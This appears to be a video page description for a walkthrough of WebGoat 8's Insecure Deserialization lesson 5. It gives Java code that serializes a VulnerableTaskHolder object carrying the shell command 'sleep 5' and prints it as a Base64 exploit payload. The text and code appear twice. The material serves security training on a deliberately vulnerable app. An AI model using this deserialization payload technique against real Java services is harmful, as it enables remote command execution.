WebGoat 8 - Insecure Deserialization - Lesson 5
7.4 هزار بار بازدید -
3 سال پیش
-
WebGoat 8 - Insecure Deserialization
WebGoat 8 - Insecure Deserialization - Lesson 5
1. Find the path for end function code.
Path:- https://github.com/WebGoat/WebGoat/bl...
2. Locate VulnerableTaskHolder class and focus on the readObject method
Path:- https://github.com/WebGoat/WebGoat/bl...
//Main.java
package org.dummy.insecure.framework;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
public class Main {
static public void main(String[] args){
try{
VulnerableTaskHolder go = new VulnerableTaskHolder("sleep", "sleep 5");
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
byte[] exploit = bos.toByteArray();
String exp = Base64.getEncoder().encodeToString(exploit);
System.out.println(exp);
} catch (Exception e){
}
}
}
1. Find the path for end function code.
Path:- https://github.com/WebGoat/WebGoat/bl...
2. Locate VulnerableTaskHolder class and focus on the readObject method
Path:- https://github.com/WebGoat/WebGoat/bl...
//Main.java
package org.dummy.insecure.framework;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
public class Main {
static public void main(String[] args){
try{
VulnerableTaskHolder go = new VulnerableTaskHolder("sleep", "sleep 5");
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
byte[] exploit = bos.toByteArray();
String exp = Base64.getEncoder().encodeToString(exploit);
System.out.println(exp);
} catch (Exception e){
}
}
}
3 سال پیش
در تاریخ 1400/03/11 منتشر شده
است.
7,438
بـار بازدید شده